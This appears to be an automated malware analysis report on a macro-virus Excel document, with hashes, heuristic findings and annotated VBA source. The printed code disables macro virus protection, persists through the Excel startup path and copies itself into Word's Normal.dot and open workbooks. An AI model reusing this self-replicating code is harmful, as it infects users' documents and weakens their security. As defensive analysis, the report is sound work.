Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7218cc9db53af72b…

MALICIOUS

Office (OLE)

26.0 KB Created: 2004-02-22 18:44:27 Authoring application: Microsoft Excel First seen: 2015-09-29
MD5: 9129717a4ca9b84eea93aad94bfaac30 SHA-1: 70c2c62c63f851bd1c2c78a38670ce0def0b090c SHA-256: 7218cc9db53af72b13c20961c3088eff471e2f672237339dc40ea89507fd2ca9
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1070.004 File Deletion

The sample is a malicious Excel document containing VBA macros. The macros attempt to disable macro virus protection and replicate their code into other documents and the Excel startup path ('Book1.'). This behavior suggests an intent to spread and persist across the user's system, potentially as a downloader or part of a larger infection chain. The ClamAV detection of 'Win.Trojan.wmvg-1' further supports its malicious nature.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set xl = CreateObject("Excel.Application")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5991 bytes
SHA-256: adf0ac5021ca1bf4ead7246107104a6917ed104ef7d796b7d2dd126de44e2e90
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Module header of the Excel "ThisWorkbook" document module as emitted by the
' VBA exporter (olevba); these Attribute lines are metadata, not executable
' statements. All of the malicious logic below lives in this one module.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True







'kr1tz do this.....!
Private Sub InfectDoc()
' Word-side infection routine. It is written against the Word object model
' (NormalTemplate, ActiveDocument, Options.VirusProtection, CommandBars,
' OrganizerDelete) although it sits in an Excel ThisWorkbook module; under
' Excel those members do not exist and every resulting error is swallowed by
' the handler on the next line, so the effective behaviour depends on the
' host application running it (confirm in a sandbox).
' Flow: (1) tamper with macro-security UI and settings, (2) choose which
' project is the "master" (source of code) and which is the "victim",
' (3) drop a copy of the code as "Book1." in the Excel startup path,
' (4) wipe the victim project's document module and overwrite it with the
' master code. The comment line immediately above this Sub ("kr1tz") is the
' marker the code searches for to recognise an already-infected module.
' Observable artifacts for defenders: writes to the Office\9.0\Word\Security
' registry value, the Options6 writes done by DisVirProt, creation of
' <Excel StartupPath>\Book1., an out-of-process Excel.Application COM
' instance, and modification of Normal.dot / the active document's VBA project.
On Error Resume Next  ' every failure below is silently ignored
Dim InstMast, SaveVict As Boolean  ' VBA: only SaveVict is Boolean, InstMast is a Variant
InstMast = False
' Macro-security tampering (the OLE_VBA_MACRO_VIRUS_REPLICATION finding above).
' If the Word security "Level1" value exists it is blanked and the "Security..."
' menu item is greyed out; otherwise Tools > Macro is greyed out and macro
' virus protection plus two confirmation prompts are switched off.
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level1") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level1") = ""
Else
    CommandBars("Tools").Controls("Macro").Enabled = False
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
        .ConfirmConversions = False
    End With
End If
' Master/victim selection: if this code runs from Normal.dot the open
' document is the victim, and vice versa. CodeMast receives the full source
' text of the master's first VBA component.
If MacroContainer = NormalTemplate Then
    Set Mast = NormalTemplate.VBProject.VBComponents.Item(1)
    Set Vict = ActiveDocument
    CodeMast = Mast.CodeModule.Lines(1, Mast.CodeModule.CountOfLines)
ElseIf MacroContainer = ActiveDocument Then
    Set Mast = ActiveDocument.VBProject.VBComponents.Item(1)
    Set Vict = NormalTemplate
    CodeMast = Mast.CodeModule.Lines(1, Mast.CodeModule.CountOfLines)
End If
DisVirProt  ' blank the Excel 8.0 "Options6" registry values (see DisVirProt)
' Excel persistence: start a separate Excel instance via COM and, unless a
' "Book1." already exists in its startup path, create a workbook, inject
' CodeMast into its ThisWorkbook module and save it there. Files in the Excel
' startup path are loaded on every Excel start (T1547.001 in the report).
Set xl = CreateObject("Excel.Application")
If UCase(Dir(xl.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
    Set Mastxl = xl.Workbooks.Add
    Mastxl.VBProject.VBComponents("ThisWorkbook").CodeModule.AddFromString CodeMast
    Mastxl.SaveAs Filename:=xl.Application.StartupPath + "\Book1."
End If
xl.Quit
' SaveVict: FullName includes the path, so its first three characters are
' presumably a drive/path prefix rather than "DOC"; this test therefore
' appears to set SaveVict = True in practice — confirm in a sandbox.
SaveVict = False
If UCase(Mid(Vict.FullName, 1, 3)) <> UCase("DOC") Then SaveVict = True
' Victim project wipe: non-document components are removed via the Word
' Organizer; a document component that does not yet carry the "kr1tz" marker
' has all its lines deleted and is flagged for reinfection.
For Each fVict In Vict.VBProject.VBComponents
    If (fVict.Type <> 100) Then
        Application.OrganizerDelete Vict.FullName, fVict.Name, wdOrganizerObjectProjectItems
    ElseIf (fVict.Type = 100) And (fVict.CodeModule.Find("kr1tz", 1, 1, 10000, 10000) = False) Then
        fVict.CodeModule.DeleteLines 1, fVict.CodeModule.CountOfLines
        InstMast = True
    End If
Next fVict
' Reinfection: copy the master source into the victim's first component and
' persist it. Note the NormalTemplate save is conditioned on Saved = True
' (as written), while ActiveDocument is saved whenever SaveVict is set.
Set Vict = Vict.VBProject.VBComponents.Item(1)
If InstMast = True Then
    Vict.CodeModule.AddFromString CodeMast
    If NormalTemplate.Saved = True Then NormalTemplate.Save
    If SaveVict = True Then ActiveDocument.Save
End If
End Sub
Private Sub Workbook_Deactivate()
' Excel-side infection routine, bound to the workbook Deactivate event (the
' only genuine Excel event handler in this module, so this is presumably the
' path that actually runs when the workbook is opened in Excel and the user
' switches away from it — confirm in a sandbox).
' Flow: (1) grab this module's source as CodeMast, (2) grey out Tools > Macro,
' (3) drop "Book1." into the Excel startup path, (4) cross-infect Word's
' Normal.dot through a COM Word.Application instance, (5) overwrite the
' non-sheet document modules of the active workbook and save it.
' Observable artifacts: an Excel.Application and a Word.Application COM
' instance spawned from Excel, creation of <StartupPath>\Book1., and
' modification of Normal.dot's VBA project.
On Error Resume Next  ' every failure below is silently ignored
Set Vict = ActiveWorkbook.VBProject.VBComponents.Item(1).CodeModule
Set Code = ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule
CodeMast = Code.Lines(1, Code.CountOfLines)  ' CodeMast is a String holding this module's source
CommandBars("Tools").Controls("Macro").Enabled = False  ' hide the macro UI from the user
' Excel persistence via the startup path (same "Book1." check as InfectDoc).
' AddToMru:=False keeps the dropped file out of the recent-files list.
' NOTE(review): CodeMast is a String at this point, so the ".Lines" call on it
' on the InsertLines line is not a valid member access; with On Error Resume
' Next that statement is skipped, which suggests the dropped Book1. may be
' saved without any code — confirm by inspecting the file in a sandbox.
If UCase(Dir(Application.StartupPath & "\Book1.")) <> "BOOK1" Then
Set xlApp = CreateObject("Excel.Application")
Set BookMast = xlApp.Workbooks.Add
BookMast.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, CodeMast.Lines(1, CodeMast.CountOfLines)
BookMast.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
xlApp.Quit
End If
' Cross-application spread into Word: a Word instance is created over COM
' (no Visible property is set, so it is presumably not shown to the user),
' the "save Normal?" prompt is suppressed, then every component of
' Normal.dot's VBA project is either removed (non-document modules) or, if it
' is a document module without the "kr1tz" marker, wiped and the first
' component overwritten with CodeMast.
Set wd = CreateObject("Word.Application")
wd.Options.SaveNormalPrompt = False
For i = 1 To wd.NormalTemplate.VBProject.VBComponents.Count
Set wdNT = wd.NormalTemplate.VBProject.VBComponents(i)
If wdNT.Type <> 100 Then
wd.Application.OrganizerDelete wd.NormalTemplate.FullName, wd.NormalTemplate.VBProject.VBComponents(i).Name, wd.wdOrganizerObjectProjectItems
ElseIf (wdNT.Type = 100) And (wdNT.CodeModule.Find("kr1tz", 1, 1, 10000, 10000) = False) Then
If wdNT.CodeModule.CountOfLines <> 0 Then
wdNT.CodeModule.DeleteLines 1, wdNT.CodeModule.CountOfLines
End If
wd.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString CodeMast
End If
Next i
' The object reference is released before Quit is called on it, so the Quit
' never reaches the Word instance (the error is swallowed). A lingering
' WINWORD process started from Excel is therefore a likely forensic artifact.
Set wd = Nothing
wd.Quit
' Active-workbook infection: any component whose source lacks the "'Code"
' marker (this module contains it through the literal on the Find line
' itself) is wiped; document modules not named "Sheet*" then receive
' CodeMast. "Addi" is assigned but never read.
For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(i).CodeModule.Find("'Code", 1, 1, 1000, 1000) = False Then
ActiveWorkbook.VBProject.VBComponents(i).CodeModule.DeleteLines 1, ActiveWorkbook.VBProject.VBComponents(i).CodeModule.CountOfLines
Addi = ActiveWorkbook.VBProject.VBComponents(i).Name
If ActiveWorkbook.VBProject.VBComponents(i).Type = 100 Then
If UCase(Mid((ActiveWorkbook.VBProject.VBComponents(i).Name), 1, 5)) <> "SHEET" Then
ActiveWorkbook.VBProject.VBComponents(i).CodeModule.AddFromString CodeMast
End If
End If
End If
' Persist the change unless the workbook is still an unsaved "Book*" default.
If Mid((ActiveWorkbook.Name), 1, 4) <> "Book" Then
If ActiveWorkbook.Saved = False Then ActiveWorkbook.Save
End If
Next i
End Sub
Private Sub DisVirProt()
' Blanks the "Options6" value under three Excel 8.0 (Office 97) registry
' locations — current user, the HKLM "New User Settings" defaults, and the
' .Default user hive — using Word's System.PrivateProfileString registry
' accessor. Presumably this is the Excel-side counterpart of the
' Options.VirusProtection = False tampering in InfectDoc (the report's
' AV-tampering finding); the three key paths are useful detection IoCs.
' No error handler here, so the routine relies on its caller's
' On Error Resume Next when run outside Word.
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
End Sub
Private Sub Document_Open()
' Entry point on document open: runs the Word-side infection routine.
' Document_Open is the Word document event name; in an Excel ThisWorkbook
' module this handler is not expected to fire (Excel uses Workbook_Open) —
' it becomes live once the code has been copied into a Word project.
InfectDoc
End Sub
Private Sub Document_Close()
' Entry point on document close: same Word-side infection routine, so an
' infected document spreads both when opened and when closed. As with
' Document_Open, this is a Word event name and is not expected to fire
' while the module lives in an Excel workbook.
InfectDoc
End Sub








' Module headers of the three worksheet document modules (Sheet1–Sheet3).
' They carry only exporter metadata and no code in this sample; the
' Workbook_Deactivate routine above deliberately skips modules whose name
' starts with "Sheet" when injecting its code.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True